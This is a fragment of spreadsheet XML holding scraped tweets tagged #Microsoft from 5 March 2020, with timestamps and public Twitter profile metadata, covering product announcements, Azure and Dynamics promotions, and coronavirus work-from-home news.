    <t>Microsoft offers Microsoft Teams (Office 365 E1 trial) free for 6 months as response to COVID-19
https://t.co/CGMcCl8vAA
#MicrosoftTeams #Office365 #Microsoft365 #Microsoft</t>
  </si>
  <si>
    <t>{'id': 25867445, 'id_str': '25867445', 'name': 'Tom Arbuthnot', 'screen_name': 'tomarbuthnot', 'location': 'London, England', 'description': 'Dad/Husband â–ªï¸ Work focused on #MicrosoftTeams &amp; #Office365 Collab â–ªï¸ MCM/MVP â–ªï¸ Architect/Product @ModalitySystems â–ªï¸ Speaking/Blog/PodcastðŸ‘‡ #MSIgnite', 'url': 'https://t.co/klBGMX0Cx2', 'entities': {'url': {'urls': [{'url': 'https://t.co/klBGMX0Cx2', 'expanded_url': 'https://tomtalks.blog/tomsemailupdate/', 'display_url': 'tomtalks.blog/tomsemailupdatâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6844, 'friends_count': 2077, 'listed_count': 329, 'created_at': 'Sun Mar 22 19:46:41 +0000 2009', 'favourites_count': 14627, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19244,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'http://pbs.twimg.com/profile_images/962692647201763328/GMcYeSDM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/962692647201763328/GMcYeSDM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25867445/1398608131', 'profile_link_color': '3F487F', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 09:27:22 +0000 2020</t>
  </si>
  <si>
    <t>When TechSmith Corporation send a team to offer video creation and #camtasia training support during #microsoft #hackathon https://t.co/lDMtZaOkmO</t>
  </si>
  <si>
    <t>{'id': 778990002596372480, 'id_str': '778990002596372480', 'name': 'Mehdi Hammadi', 'screen_name': 'HappyMedia_dz', 'location': 'AlgÃ©rie', 'description': '', 'url': 'https://t.co/E5nXiYmK2t', 'entities': {'url': {'urls': [{'url': 'https://t.co/E5nXiYmK2t', 'expanded_url': 'http://officeusers.blogspot.com', 'display_url': 'officeusers.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 46, 'friends_count': 139, 'listed_count': 0, 'created_at': 'Thu Sep 22 16:11:04 +0000 2016', 'favourites_count': 378, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 792,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'http://pbs.twimg.com/profile_images/781466969967104002/cbAPUqek_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/781466969967104002/cbAPUqek_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/778990002596372480/1502110640',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</si>
  <si>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09:24:00 +0000 2020</t>
  </si>
  <si>
    <t>In few minutes in Lisbon, Maria Jordan will talks about #Microsoft #Hybridcloud Strategy with the new #AzureStack components #AzureArc #AzureStackEdge #AzurestackHCI
Access the slidedeck at  https://t.co/JuaCQWWvUF
#HPE #HCI @DamirB @PTMicrosoft #makeyourownlane #WomenInTech https://t.co/nojvCY9lK6</t>
  </si>
  <si>
    <t>Thu Mar 05 09:19:51 +0000 2020</t>
  </si>
  <si>
    <t>South Africa vs Australia: SA put Australia into bat #RSAvAUS https://t.co/ZdaGNtkY9O 
#bigdata 
#Women 
#WomensDay 
#WomensT20WorldCup 
#WWCC2020 #AUSTRALiA 
#SOUTHAFRiCA 
#bigdata 
 #apple
#oracle 
#Microsoft
#sports #ICC 
@Chidambara09 #linux #china #usa #google #youtuber</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</si>
  <si>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927141,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</si>
  <si>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09:17:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Dynamics #AX is a powerful ERP solution that helps global enterprises organize, automate, and optimize their processes. To Know More about Microsoft Dynamics Click Here: https://t.co/1A5nH8S6h6 
#GangBoard #Microsoft #customer
#business #Software</t>
  </si>
  <si>
    <t>{'id': 745891466438975488, 'id_str': '745891466438975488', 'name': 'GangBoard', 'screen_name': 'GangBoardSocial', 'location': 'India', 'description': 'GangBoard is a live, interactive platform of software training furnishing personalities with momentary way in to prosperous sundry courses. Get Certification!', 'url': 'https://t.co/1EtBTNRfdS', 'entities': {'url': {'urls': [{'url': 'https://t.co/1EtBTNRfdS', 'expanded_url': 'http://gangboard.com', 'display_url': 'gangboard.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 314, 'friends_count': 423, 'listed_count': 20, 'created_at': 'Thu Jun 23 08:09:18 +0000 2016', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1810, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/817342023577387008/tH5tREcZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/817342023577387008/tH5tREcZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/745891466438975488/1574516034',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</si>
  <si>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09:16:16 +0000 2020</t>
  </si>
  <si>
    <t>Check out MICROSOFT WINDOWS FOR WORKGROUPS MS-DOS OPERATING SYSTEMS PLUS ENHANCED TOOLS #Microsoft https://t.co/dpwMUzSMrz via @eBay</t>
  </si>
  <si>
    <t>{'id': 2830180034, 'id_str': '2830180034', 'name': 'George', 'screen_name': '2rookscoinscom', 'location': 'Europe', 'description': 'At my website you can purchase High Quality Ancient Museum restrike coins, at low prices! BRONZE, SILVER &amp; GOLD !', 'url': 'http://t.co/Kn3cTwGISq', 'entities': {'url': {'urls': [{'url': 'http://t.co/Kn3cTwGISq', 'expanded_url': 'http://www.2rookscoins.com', 'display_url': '2rookscoins.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 751, 'friends_count': 1223, 'listed_count': 4, 'created_at': 'Wed Sep 24 16:58:35 +0000 2014', 'favourites_count': 40, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3125,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'http://pbs.twimg.com/profile_images/514823354650349568/odvN4Ery_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/514823354650349568/odvN4Ery_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2830180034/1411578487',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</si>
  <si>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09:15:25 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 09:14:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft #Azure Certification: Where to Start?
 #architecture #infrastructure #mcsd #Microsoft #Build5Nines #AzureFamily
https://t.co/Z9IznePFH7</t>
  </si>
  <si>
    <t>Thu Mar 05 09:13:02 +0000 2020</t>
  </si>
  <si>
    <t>Tech: Microsoft Azure Sphere, an IoT security solution including hardware, OS and cloud components, is generally available. #iot #microsoft #azuresphere https://t.co/HPdFbTONyF https://t.co/CJGnoRqLve</t>
  </si>
  <si>
    <t>{'id': 880485615766319106, 'id_str': '880485615766319106', 'name': 'RUBINLAKE', 'screen_name': 'RubinlakeHQ', 'location': 'Frankfurt on the Main, Germany', 'description': 'ðŸ§  Market Intelligence.\nðŸŽ¯ Moving companies forward.\nðŸ‘‰ Follow us, gain insights.', 'url': 'https://t.co/ik4XiFrDW6', 'entities': {'url': {'urls': [{'url': 'https://t.co/ik4XiFrDW6', 'expanded_url': 'http://rubinlake.com', 'display_url': 'rubinlake.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 12, 'listed_count': 1, 'created_at': 'Thu Jun 29 17:58:24 +0000 2017', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1164591406440210434/DjLkjmIf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1164591406440210434/DjLkjmIf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/880485615766319106/1582563563', 'profile_link_color': 'CC3333',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</si>
  <si>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09:10:02 +0000 2020</t>
  </si>
  <si>
    <t>New IDC report shows big opportunities to transform higher education through Artificial Intelligence   https://t.co/E93VUB81qd #Microsoft #ai #ArtificialIntelligence #MachineLearning #education #edutech https://t.co/UI1Rwru48A</t>
  </si>
  <si>
    <t>Thu Mar 05 09:08:47 +0000 2020</t>
  </si>
  <si>
    <t>Power BI Tab for Microsoft Team  now you will have everything in one place!  https://t.co/nEmuKmQXAH A handy solution to have data right there. 
#powerbi #pbi #microsoftpowerbi #microsoft #teams #collaboration #dashboard  #microsoftteams #office365</t>
  </si>
  <si>
    <t>{'id': 1180028979161571329, 'id_str': '1180028979161571329', 'name': 'datacourage', 'screen_name': 'datacourage', 'location': 'WrocÅ‚aw London Porto', 'description': '', 'url': 'https://t.co/LUnuPIHcgi', 'entities': {'url': {'urls': [{'url': 'https://t.co/LUnuPIHcgi', 'expanded_url': 'https://datacourage.com/', 'display_url': 'datacourage.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Fri Oct 04 07:57:01 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 70, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1180134719696060416/J22Nsgw6_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180134719696060416/J22Nsgw6_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1180028979161571329/1570201043',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</si>
  <si>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09:05:59 +0000 2020</t>
  </si>
  <si>
    <t>Leveraging the New Office App -- a comparison of the standalone apps for Word, Excel, PowerPoint, OneDrive, and Office Lens https://t.co/PVksunxk1h #Microsoft #MicrosoftOffice #productivity #UX #MVPBuzz</t>
  </si>
  <si>
    <t>Thu Mar 05 09:00:51 +0000 2020</t>
  </si>
  <si>
    <t>Type Fractions: Want to display a proper fraction (eg 1/5) instead of a decimal in #Excel? Type 0 and space before your fraction and Excel will ignore the 0 so you get 1/5 displayed #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 09:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Read my Mar 5 #Microsoft Newsletter featuring CASE STUDY: How... https://t.co/PrnyfmFz4C Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>Thu Mar 05 09:00:17 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/SCHEa1Bnyv</t>
  </si>
  <si>
    <t>Thu Mar 05 08:57:00 +0000 2020</t>
  </si>
  <si>
    <t>Do you want to give access to your external accountant but are unsure how?
https://t.co/ErZyGbuTW0
#dynamics365 #businesscentral #Accountant #accountancy #howto #solved #Microsoft https://t.co/NkYD2cKYlM</t>
  </si>
  <si>
    <t>{'id': 307522262, 'id_str': '307522262', 'name': 'Dynamics Consultants', 'screen_name': 'NavConsultants', 'location': 'Southampton', 'description': 'Business Software Specialists | @Microsoft Partner for ERP | implementation support development training | Dynamics 365 Business Central partner in the UK', 'url': 'https://t.co/I3Nw9MF8Jm', 'entities': {'url': {'urls': [{'url': 'https://t.co/I3Nw9MF8Jm', 'expanded_url': 'http://dynamics-consultants.co.uk', 'display_url': 'dynamics-consultants.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 608, 'friends_count': 270, 'listed_count': 173, 'created_at': 'Sun May 29 19:55:56 +0000 2011', 'favourites_count': 836, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3825, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/925721788725825538/MA3Q0S9r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/925721788725825538/MA3Q0S9r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/307522262/1543317101',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</si>
  <si>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08:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Technology giant @Microsoft has announced access to free cloud technologies for startups keen on solving social and environmental challenges. 
 https://t.co/yUH8oBiUAc  
#socialenterprise #microsoft #startups</t>
  </si>
  <si>
    <t>Thu Mar 05 08:50:00 +0000 2020</t>
  </si>
  <si>
    <t>Urs Renggli talks about the Global #HPE #Microsoft #Hybridcloud Summit 2020 roadshow and shares top 3 reasons to attend the next event from 30 locations WorldWide : today at #Lisbon !
@PTMicrosoft #Social4UTV @tiagocostapt @rpluto @psousa75 @joaoedusousa #Lisboa https://t.co/LNeTsVoumN</t>
  </si>
  <si>
    <t>Thu Mar 05 08:49:00 +0000 2020</t>
  </si>
  <si>
    <t>I am quite convinced they have already made up space in Dante's https://t.co/GR82HQlion circle for the #Microsoft @Office #Outlook UX designer who replaced "Invite attendees required field" with "Title". Major confusion - daily :( https://t.co/0DqmhJHNiQ</t>
  </si>
  <si>
    <t>{'id': 386494103, 'id_str': '386494103', 'name': 'Erling Morkemo', 'screen_name': 'morkemo', 'location': 'BÃ¦rum, Norge', 'description': 'Art, marketing, and politics: Norwegian and international. #TrÃ¸nder', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 372, 'friends_count': 1672, 'listed_count': 16, 'created_at': 'Fri Oct 07 11:37:27 +0000 2011', 'favourites_count': 2151, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3183,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'http://pbs.twimg.com/profile_images/1130532649657917441/cawqPrm0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1130532649657917441/cawqPrm0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/386494103/1413405392', 'profile_link_color': '89C9FA',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</si>
  <si>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08:48:23 +0000 2020</t>
  </si>
  <si>
    <t>@coincornermolly @crypto_sepp Eat
Sleep 
Buy $LINK 
Get Rich 
#Microsoft 
is on Board 
You 
Dont 
Need
To
Repeat 
Cause 
You 
Made 
it!</t>
  </si>
  <si>
    <t>Thu Mar 05 08:47:08 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus impact: #Microsoft tells #US employees to work from home
https://t.co/85opakuuib https://t.co/wJ4Ojmx7Z6</t>
  </si>
  <si>
    <t>{'id': 224961966, 'id_str': '224961966', 'name': 'YesPunjab.com (For Punjabi follow @BawaHs)', 'screen_name': 'yespunjab', 'location': 'Punjab', 'description': 'https://t.co/L8t5kU2S6h #News #Entertainment #Website with focus on #Punjab #NRIs #India by #HSBawa @bawahs #Journalist. https://t.co/SkG9zabiMw', 'url': 'https://t.co/r2Z3lPzyuG', 'entities': {'url': {'urls': [{'url': 'https://t.co/r2Z3lPzyuG', 'expanded_url': 'http://yespunjab.com', 'display_url': 'yespunjab.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/L8t5kU2S6h', 'expanded_url': 'http://YesPunjab.com', 'display_url': 'YesPunjab.com', 'indices': [0, 23]}, {'url': 'https://t.co/SkG9zabiMw', 'expanded_url': 'https://www.facebook.com/YesPunjab', 'display_url': 'facebook.com/YesPunjab', 'indices': [121, 144]}]}}, 'protected': False, 'followers_count': 112865, 'friends_count': 152612, 'listed_count': 912, 'created_at': 'Fri Dec 10 09:11:16 +0000 2010', 'favourites_count': 41, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 269124, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F5C4', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1184016061244424192/rWqNCbts_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184016061244424192/rWqNCbts_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/224961966/1476203275', 'profile_link_color': 'ED1111', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '7AC3EE', 'profile_text_color': 'FF0000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 08:46:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's #SiliconValley staff to work from home amid #coronavirus fears
https://t.co/XhXpBnFz5N</t>
  </si>
  <si>
    <t>{'id': 986497864481193986, 'id_str': '986497864481193986', 'name': 'sanikasurve8', 'screen_name': 'marketnews201', 'location': 'Mumbai, India', 'description': 'Latest Stock news and updates.', 'url': 'https://t.co/s5xRhKmpGC', 'entities': {'url': {'urls': [{'url': 'https://t.co/s5xRhKmpGC', 'expanded_url': 'https://www.business-standard.com/markets', 'display_url': 'business-standard.com/markets', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 371, 'friends_count': 448, 'listed_count': 4, 'created_at': 'Wed Apr 18 06:53:13 +0000 2018', 'favourites_count': 1135, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10430,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'http://pbs.twimg.com/profile_images/1207609618416861185/p5TKTu53_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207609618416861185/p5TKTu53_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/986497864481193986/1579839811',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</si>
  <si>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08:45:17 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">@davepermen Nobody forces you to use products from #Microsoft.
Live by the sword, die by the sword </t>
  </si>
  <si>
    <t>{'id': 240775208, 'id_str': '240775208', 'name': 'Christian ðŸŒžâš¡ï¸ðŸ¡ðŸ”‹ðŸ”ŒðŸš—', 'screen_name': 'cfrey1977', 'location': 'Steinenbronn, Deutschland', 'description': 'Elektromobilist, PV-Anlagen Betreiber, AufklÃ¤rer\nR-Code: https://t.co/Fc3aKUpCvs', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/Fc3aKUpCvs', 'expanded_url': 'http://ts.la/christian260', 'display_url': 'ts.la/christian260', 'indices': [57, 80]}]}}, 'protected': False, 'followers_count': 472, 'friends_count': 66, 'listed_count': 12, 'created_at': 'Thu Jan 20 18:26:03 +0000 2011', 'favourites_count': 6730, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3487,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'http://pbs.twimg.com/profile_images/740996693798293504/va50sqYD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/740996693798293504/va50sqYD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/240775208/1530024781',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</si>
  <si>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08:44:18 +0000 2020</t>
  </si>
  <si>
    <t>HPE's @b_hallmans &amp;amp; Maria Jordan from Microsoft are getting ready to impress the crowd attending todays #HPE &amp;amp; #Microsoft #HybridCloud Roadshow in Lisbon. Great insights how enterprises can ignite innovation with HPE and @Microsoft Hybrid #Cloud. #HPEAlliances @msPartner @Azure https://t.co/r3tV3ypzNK</t>
  </si>
  <si>
    <t>Thu Mar 05 08:40:05 +0000 2020</t>
  </si>
  <si>
    <t>Back in Oct 2018, #Microsoft revealed its new #Dynamics365 #TeamMember SKU which included changes from its launch SKU. Since then, Microsoft hasnt applied them to #SMEs, however this will change as Microsoft said will have new Team Member App modules https://t.co/mC71czJqiL https://t.co/GGn6a6Cn8M</t>
  </si>
  <si>
    <t>{'id': 43103716, 'id_str': '43103716', 'name': 'Advantage', 'screen_name': 'DynamicsABS', 'location': 'London, UK', 'description': 'Microsoft Gold &amp; Silver ERP,CRM &amp; IT Managed Services Partner with 19 years of experience. We help small &amp; medium sized businesses transform the way they work.', 'url': 'http://t.co/xvzHh6Ir6H', 'entities': {'url': {'urls': [{'url': 'http://t.co/xvzHh6Ir6H', 'expanded_url': 'http://www.advantage.co.uk', 'display_url': 'advantage.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1687, 'friends_count': 4962, 'listed_count': 204, 'created_at': 'Thu May 28 12:59:29 +0000 2009', 'favourites_count': 320, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5725,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'http://pbs.twimg.com/profile_images/921014576027594753/NBfkdW-3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/921014576027594753/NBfkdW-3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/43103716/1511172590', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'D8DADB', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 08:40:01 +0000 2020</t>
  </si>
  <si>
    <t>Join us today at 12 PM ET / 17 UTC for our #DevNation tech talk on hybrid #CloudNative #Java #microservices, distributed across #AWS, #GoogleCloudPlatform and #Microsoft #Azure, with real-time load-balancing and fail-over. #Kubernetes #Skupper https://t.co/fCyvuW7Xqy https://t.co/ERGQRKuPJK</t>
  </si>
  <si>
    <t>{'id': 3249871370, 'id_str': '3249871370', 'name': 'Red Hat Developer', 'screen_name': 'rhdevelopers', 'location': '', 'description': 'Red Hat Developer program provides no-cost software subscriptions, tutorials and career insights to enterprise software developers and architects.', 'url': 'https://t.co/wtVnmYTvef', 'entities': {'url': {'urls': [{'url': 'https://t.co/wtVnmYTvef', 'expanded_url': 'http://developer.redhat.com', 'display_url': 'developer.redhat.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11688, 'friends_count': 470, 'listed_count': 206, 'created_at': 'Fri Jun 19 14:59:44 +0000 2015', 'favourites_count': 5663, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3288,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'http://pbs.twimg.com/profile_images/1123604939668971520/CD1KW1w9_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1123604939668971520/CD1KW1w9_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3249871370/1556717079',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</si>
  <si>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08:39:59 +0000 2020</t>
  </si>
  <si>
    <t>The new Microsoft app can make your life a lot easier. It integrates the function of Word, PowerPoint and Excel. Here is it's features: https://t.co/RuT491OSGU
#Microsoft #word #PowerPoint #Excel #app #logesys #new #cloud #data #dataanalysis #analysis #office</t>
  </si>
  <si>
    <t>{'id': 973446370584662018, 'id_str': '973446370584662018', 'name': 'Logesys', 'screen_name': 'LogesysSolution', 'location': 'Bangalore', 'description': 'Logesys Solutions India Pvt. Ltd., is a leading Data and Content management service provider, based out of Bangalore, India.', 'url': 'https://t.co/k2iSKlXOkc', 'entities': {'url': {'urls': [{'url': 'https://t.co/k2iSKlXOkc', 'expanded_url': 'http://www.logesys.com/', 'display_url': 'logesys.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Tue Mar 13 06:31:15 +0000 2018', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 136, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/992070180955197440/VxHRwOl5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/992070180955197440/VxHRwOl5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/973446370584662018/1525362968',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</si>
  <si>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08:38:53 +0000 2020</t>
  </si>
  <si>
    <t>Yesterday saw the release of #PowerShell7. 
Updated to #dotnetcore 3.1, the latest LTS version. Includes pipeline parallelization &amp;amp; new operators. 
Read more at https://t.co/Av4hVSjq9b
#Microsoft #CrossPlatform #Windows #Linux #developer</t>
  </si>
  <si>
    <t>{'id': 534126512, 'id_str': '534126512', 'name': 'Nutty About Hosting', 'screen_name': 'nahosting', 'location': 'Devon, UK', 'description': 'UK Web Hosting company specialising in Windows Hosting. Also Office 365 | Domain names | SSL certs &amp; more. Friendly UK support from professional web developers.', 'url': 'https://t.co/fqdQfDABot', 'entities': {'url': {'urls': [{'url': 'https://t.co/fqdQfDABot', 'expanded_url': 'https://www.nuttyabouthosting.co.uk', 'display_url': 'nuttyabouthosting.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 503, 'friends_count': 477, 'listed_count': 83, 'created_at': 'Fri Mar 23 10:19:14 +0000 2012', 'favourites_count': 149, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1853, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F5F5', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/466473095218204672/w16ExUIH_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/466473095218204672/w16ExUIH_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/534126512/1432225623', 'profile_link_color': '7A4B99',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</si>
  <si>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08:38:24 +0000 2020</t>
  </si>
  <si>
    <t>Thanks to Microsoft for a great Ignite The Tour event in Copenhagen last week  and cheers to everyone who met up with us  @MS_Ignite @MicrosoftIoT @MSDeviceIoT #MSIgnite #MSIgniteTheTour #Microsoft #MicrosoftIoT #IoTinActionMS #AzureIoT #DigitalTransformation #Industry40 #IIoT https://t.co/gLTp9xVXrR</t>
  </si>
  <si>
    <t>{'id': 887118556969799680, 'id_str': '887118556969799680', 'name': 'Omnio.net', 'screen_name': 'omnio_iot', 'location': 'Copenhagen, Denmark', 'description': 'Unified data fuels industrial transformation â€” onboard devices and stream unified data in seconds with Omnio. #IIoT', 'url': 'https://t.co/qs2l6YErMk', 'entities': {'url': {'urls': [{'url': 'https://t.co/qs2l6YErMk', 'expanded_url': 'http://omnio.net', 'display_url': 'omnio.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 198, 'friends_count': 501, 'listed_count': 6, 'created_at': 'Tue Jul 18 01:15:20 +0000 2017', 'favourites_count': 745, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 417,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'http://pbs.twimg.com/profile_images/1187613736837799938/-hii5COi_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187613736837799938/-hii5COi_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/887118556969799680/1578048001', 'profile_link_color': '0031B9',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</si>
  <si>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08:34:30 +0000 2020</t>
  </si>
  <si>
    <t>Working from home is optional at Microsofts Chinese offices, but a large percentage of the companys employees are utilizing the option, according to Kurt DelBene, Microsofts head of corporate strategy.
https://t.co/uEGSXCzEeR
 #microsoft #remote #telecommute #coronavirus</t>
  </si>
  <si>
    <t>{'id': 17366048, 'id_str': '17366048', 'name': 'Amunategui - ViralML.com', 'screen_name': 'amunategui', 'location': 'Barcelona, Spain', 'description': "Let's Port ML to the Web Today! \n\nAuthor of Monetizing ML, Python Web Work &amp; Book of Fundamental Indicators | https://t.co/S1vua3IlP2 | https://t.co/jqhBo3iMj2\n\nSign up at https://t.co/gLCn5jEwwC", 'url': 'https://t.co/S1vua3IlP2', 'entities': {'url': {'urls': [{'url': 'https://t.co/S1vua3IlP2', 'expanded_url': 'http://ViralML.com', 'display_url': 'ViralML.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/S1vua3IlP2', 'expanded_url': 'http://ViralML.com', 'display_url': 'ViralML.com', 'indices': [110, 133]}, {'url': 'https://t.co/jqhBo3iMj2', 'expanded_url': 'http://FastML.io', 'display_url': 'FastML.io', 'indices': [136, 159]}, {'url': 'https://t.co/gLCn5jEwwC', 'expanded_url': 'http://viralml.com', 'display_url': 'viralml.com', 'indices': [172, 195]}]}}, 'protected': False, 'followers_count': 8225, 'friends_count': 8960, 'listed_count': 37, 'created_at': 'Thu Nov 13 14:48:01 +0000 2008', 'favourites_count': 3231, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5977,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'http://pbs.twimg.com/profile_images/1211590718181060609/TuRRSsqd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211590718181060609/TuRRSsqd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17366048/1582531253',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</si>
